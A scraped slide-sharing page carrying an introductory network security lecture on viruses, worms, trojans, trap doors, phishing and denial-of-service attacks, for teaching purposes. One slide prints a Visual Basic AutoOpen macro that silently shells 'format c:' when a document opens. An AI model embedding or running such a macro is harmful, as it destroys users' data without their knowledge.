Network Security Lecture 5 Presented by: Dr. Munam Ali Shah.

Slides:



Advertisements
Similar presentations
Thank you to IT Training at Indiana University Computer Malware.
Advertisements

Security and Trust in E- Commerce. The E-commerce Security Environment: The Scope of the Problem  Overall size of cybercrime unclear; amount of losses.
Dr. John P. Abraham Professor UTPA 2 – Systems Threats and Risks.
Lecturer: Fadwa Tlaelan
CHAPTER 2 KNOW YOUR VILLAINS. Who writes it: Malware writers vary in age, income level, location, social/peer interaction, education level, likes, dislikes.
1 Topic 1 – Lesson 3 Network Attacks Summary. 2 Questions ► Compare passive attacks and active attacks ► How do packet sniffers work? How to mitigate?
Computer Viruses.
Introduction to Security Computer Networks Computer Networks Term B10.
Chapter 14 Computer Security Threats Patricia Roy Manatee Community College, Venice, FL ©2008, Prentice Hall Operating Systems: Internals and Design Principles,
1 Pertemuan 05 Malicious Software Matakuliah: H0242 / Keamanan Jaringan Tahun: 2006 Versi: 1.
Malicious Attacks. Introduction Commonly referred to as: malicious software/ “malware”, computer viruses Designed to enter computers without the owner’s.
S EC (4.5): S ECURITY 1. F ORMS OF ATTACK There are numerous way that a computer system and its contents can be attacked via network connections. Many.
Copyright © Clifford Neuman - UNIVERSITY OF SOUTHERN CALIFORNIA - INFORMATION SCIENCES INSTITUTE USC CSci530 Computer Security Systems Lecture.
Lesson 9-Securing a Network. Overview Identifying threats to the network security. Planning a secure network.
Henric Johnson1 Chapter 10 Malicious Software Henric Johnson Blekinge Institute of Technology, Sweden
Video Following is a video of what can happen if you don’t update your security settings! security.
1 Ola Flygt Växjö University, Sweden Malicious Software.
1 Chap 10 Malicious Software. 2 Viruses and ”Malicious Programs ” Computer “Viruses” and related programs have the ability to replicate themselves on.
© 2007 Cisco Systems, Inc. All rights reserved.Cisco Public ITE PC v4.0 Chapter 1 1 Basic Security Networking for Home and Small Businesses – Chapter 8.
Chapter 15: Security (Part 1). The Security Problem Security must consider external environment of the system, and protect the system resources Intruders.
13.1 Silberschatz, Galvin and Gagne ©2011 Operating System Concepts Essentials – 8 th Edition Security.
Malicious Code Brian E. Brzezicki. Malicious Code (from Chapter 13 and 11)
Malware  Viruses  Virus  Worms  Trojan Horses  Spyware –Keystroke Loggers  Adware.
The Utility Programs: The system programs which perform the general system support and maintenance tasks are known as utility programs. Tasks performed.
Internet Security facilities for secure communication.
Viruses & Destructive Programs
Lecture 14 Overview. Program Flaws Taxonomy of flaws: – how (genesis) – when (time) – where (location) the flaw was introduced into the system 2 CS 450/650.
Introduction to ITE Chapter 9 Computer Security. Why Study Security?  This is a huge area for computer technicians.  Security isn’t just anti-virus.
1 Chapter 19: Malicious Software Fourth Edition by William Stallings Lecture slides by Lawrie Brown (Modified by Prof. M. Singhal, U of Kentucky)
Chapter 13 Understanding E-Security. 2 OBJECTIVES What are security concerns (examples)? What are two types of threats (client/server) Virus – Computer.
1 Chap 10 Virus. 2 Viruses and ”Malicious Programs ” Computer “Viruses” and related programs have the ability to replicate themselves on an ever increasing.
Viruses, Trojans and Worms The commonest computer threats are viruses. Virus A virus is a computer program which changes the way in which the computer.
Network Security Lecture 31 Presented by: Dr. Munam Ali Shah.
Attacks On systems And Networks To understand how we can protect our system and network we need to know about what kind of attacks a hacker/cracker would.
Chapter 10 Malicious software. Viruses and ” Malicious Programs Computer “ Viruses ” and related programs have the ability to replicate themselves on.
Trojan Horses on the Web. Definition: A Trojan horse a piece of software that allows the user think that it does a certain task, while actually does an.
For any query mail to or BITS Pilani Lecture # 1.
Copyright © 2007 Heathkit Company, Inc. All Rights Reserved PC Fundamentals Presentation 25 – Virus Detection and Prevention.
What is risk online operation:  massive movement of operation to the internet has attracted hackers who try to interrupt such operation daily.  To unauthorized.
Topic 5: Basic Security.
Network Programming and Network Security Lane Thames Graduate Research Assistant.
BY FIOLA CARVALHO TE COMP. CONTENTS  Malicious Software-Definition  Malicious Programs Backdoor Logic Bomb Trojan Horse Mobile Code Multiple-Threat.
Viruses a piece of self-replicating code attached to some other code – cf biological virus both propagates itself & carries a payload – carries code to.
Malicious Software.
Chapter 19 – Malicious Software What is the concept of defense: The parrying of a blow. What is its characteristic feature: Awaiting the blow. —On War,
Computer virus Speaker : 蔡尚倫.  Introduction  Infection target  Infection techniques Outline.
Computer Security Threats CLICKTECHSOLUTION.COM. Computer Security Confidentiality –Data confidentiality –Privacy Integrity –Data integrity –System integrity.
14.1 Silberschatz, Galvin and Gagne ©2009 Operating System Concepts with Java – 8 th Edition Protection.
Presented by: Dr. Munam Ali Shah
Understand Malware LESSON Security Fundamentals.
W elcome to our Presentation. Presentation Topic Virus.
Types of Computer Malware. The first macro virus was written for Microsoft Word and was discovered in August Today, there are thousands of macro.
INTRODUCTION TO COMPUTER & NETWORK SECURITY INSTRUCTOR: DANIA ALOMAR.
MALICIOUS SOFTWARE Rishu sihotra TE Computer
Page 1 Viruses. Page 2 What Is a Virus A virus is basically a computer program that has been written to perform a specific set of tasks. Unfortunately,
Information Systems CS-507 Lecture 32. Physical Intrusion The intruder could physically enter an organization to steal information system assets or carry.
Attack Methods  Attacks  DoS (Denial of Service)  Malware.
PCs ENVIRONMENT and PERIPHERALS Lecture 10. Computer Threats: - Computer threats: - It means anything that has the potential to cause serious harm to.
Created by the E-PoliceSlide 122 February, 2012 Dangers of s By Michael Kuc.
SAMET KARTAL No one wants to share own information with unknown person. Sometimes while sharing something with someone people wants to keep.
Silberschatz, Galvin and Gagne ©2013 Operating System Concepts Essentials – 2 nd Edition Chapter 14a: Security I.
Botnets A collection of compromised machines
3.6 Fundamentals of cyber security
Viruses and Other Malicious Content
Botnets A collection of compromised machines
NET 311 Information Security
Computer Applications Unit B
Chap 10 Malicious Software.
Chap 10 Malicious Software.
Presentation transcript:

Network Security Lecture 5 Presented by: Dr. Munam Ali Shah

Summary of the previous lecture  In Previous lecture, we talked about security through obscurity  We have seen the X.800 Security architecture  We also learnt about active and passive attacks  And importantly, we discussed the difference between Security and Protection. How access matrix is used to classify objects, Domains and access-rights

Part 2(a) Analysis of the N/W Security

Outlines  Different types of security attacks in a computing environment  Viruses, Worms, Trojan Horses  DoS attacks and its types

Objectives To be able to distinguish between different types of security attacks To identify and classify which security attacks leads to which security breach category

Different Types of Attacks and Threats Virus Worms Trojan Horse Botnet Trap doors Logic Bomb Spyware

Viruses A Virus infects executable programs by appending its own code so that it is run every time the program runs. Viruses may be destructive (by destroying/altering data) may be designed to “spread” only  Although they do not carry a dangerous “payload”, they consume resources and may cause malfunctions in programs if they are badly written and should therefore be considered dangerous! Viruses have been a major threat in the past decades but have nowadays been replaced by self- replicating worms, spyware and adware as the no. 1 threat! 7

Virus Types Boot Sector Virus Spreads by passing of floppy disks Substitutes its code for DOS boot sector or Master Boot Record Used to be very common in 1980ies and 1990ies 8

An Example of Boot Sector Virus

Polymorphic Virus Virus that has the ability to “change” its own code to avoid detection by signature scanners Macro Virus Is based on a macro programming language of a popular application (e.g. MS Word/Excel, etc.) Stealth Virus Virus that has the ability to hide its presence from the user. The virus may maintain a copy of the original, uninfected data and monitor system activity 10

Example of Macro Virus Visual Basic Macro to reformat hard drive Sub AutoOpen() Dim oFS Set oFS = CreateObject(’’Scripting.FileSystemObject’’ ) vs = Shell(’’c:command.com /k format c:’’,vbHide) End Sub

Trap Door  Trap doors, also referred to as backdoors, are bits of code embedded in programs by the programmer(s) to quickly gain access at a later time.  A programmer may purposely leaves this code in or simply forgets to remove it, a potential security hole is introduced. Hackers often plant a backdoor on previously compromised systems to gain later access

Worms A Worm is a piece of software that uses computer networks (and security flaws) to create copies of itself First Worm in 1988: “Internet Worm“ propagated via exploitation of several BSD and sendmail- bugs infected large number of computers on the Internet Some “successful“ Worms Code Red in 2001  Infected hundreds of thousands of systems by exploiting a vulnerability in Microsoft‘s Internet Information Server Blaster in 2003  Infected hundreds of thousands of systems by exploiting a vulnerability in Microsoft‘s RPC service 13

Trojan Horse

Trojan Horses A Trojan is (non-self-replicating program) that appears to perform a desirable function for the user but instead facilitates unauthorized access to the user's computer system It is embedded within or disguised as legitimate software Trojans may look interesting to the unsuspecting user, but are harmful when actually executed Two types of Trojan Horses Useful software that has been corrupted by an attacker to execute malicious code when the program is run Standalone program that masquerades as something else (like a game, or a neat little utility) to trick the user into running it Trojan Horses do not operate autonomously 15

Types of Trojan Horses (1/2) Remote Access Trojans / Remote Control Trojans Most dangerous types of trojans Enable the attacker to read every keystroke of the victim, recover passwords, etc. Examples: NetBus, Sub7, BackOrifice, BO2K, … Proxy Trojans Provide a relay for an attacker so that he is able to disguise the origin of his activities DDoS Zombies Are used for large-scale Distributed Denial of Service attacks 16

Types of Trojan Horses (2/2) Data-Sending Trojans Are used by attackers to gather certain data  Passwords  E-banking credentials Gathered data is often transferred to a location on the Internet where the attacker can harvest the data later on Destructive Trojans Trojans that perform directly harmful activity  Altering data  Encrypting files 17

Phishing It is process of attempting to acquire sensitive information such as usernames, password and credit card details by masquerading as a trustworthy entity in an electronic communication Defenses Against Phishing Number one defense is raising user awareness and user education Very few effective technical countermeasures to completely stop phishing 18

Denial of Service (DoS) Attacks Denial of Service attacks are an attempt to make computer resources unavailable to their intended users DoS attacks are (normally) not highly sophisticated, but merely bothersome Force administrator to restart service or reboot machine DoS attacks are dangerous for businesses that rely on availability (e.g. Webshops, eGovernment platforms, etc.) 19

Categories of Denial of Service Attacks Stopping services Exhausting resources Attack is Launch Locally- Process killing - System reconfiguring - Forking process to fill process table - Filling up the file system Remotely- Malfunction packet attack - Packet flood (e.g. SYN flood, Smurf ) 20

DoS: Stopping Services (locally) Easy if an attacker has already gained root- access, he could simply … shutdown the service reconfigure the service If an attacker has a “normal“ account on the system, he could try to “become root“ using an exploit to perform any of the activities listed above 21

DoS: Exhausting Resources (Locally ) An attacker might try to run a program that grabs resources on the target machine itself Most operating systems attempt to isolate users to prevent one user from grabbing all system resources Intruders often find ways around these attempts (or may try to “become root“ by using an exploit) Common methods of exhausting resources – Filling up the process table – Filling up the file system – Sending traffic that fills up the communications list 22

DoS: Stopping Services (Remotely) Much more popular than local DoS attacks, because the attacker does not need a local account on the target machine Often a “malformed packet“ attack, that relies on errors in the TCP/IP stack or network protocol of an application and causes the remote machine (or just the application) to crash 23

DoS: Exhausting Resources (Remotely) An attacker tries tying up all resources of the target system (particularly the communications link) Popular example: SYN-Flood During a SYN-Flood an attacker will send a lot of SYN packets with a spoofed (and unresponsive) source address to the target and never complete the handshake to fill up the connection queue or the communication link (and cause a DoS) 24

DDoS DDoS attack terminology Attacking machines are called daemons, slaves, zombies or agents. “Zombies” are usually poorly secured machines that are exploited (Also called agents) Machines that control and command the zombies are called masters or handlers. Attacker would like to hide trace: He hides himself behind machines that are called stepping stones. 25

Great Programming Required? Remember !! The hackers and attackers are expert level programmers They now most of the programming concepts They simply find the loopholes in the system to exploit the opportunity to break-in the system. To become resilient against threats and to know the programming level of attackers, and to determine the bug, YES great programming is required.

Summary of today’s lecture In today’s lecture, we discussed in detail about different types of security attacks that a computer system is/can be vulnerable to. Our discussion included some famous attacks such as virus, worms, DoS, Trojan horse etc.

Next lecture topics We will have our discussion continued on DoS attacks. We will see how DoS attacks can cost million of $$$$ to a company We will explore more types and sub-types of DoS attacks.

The End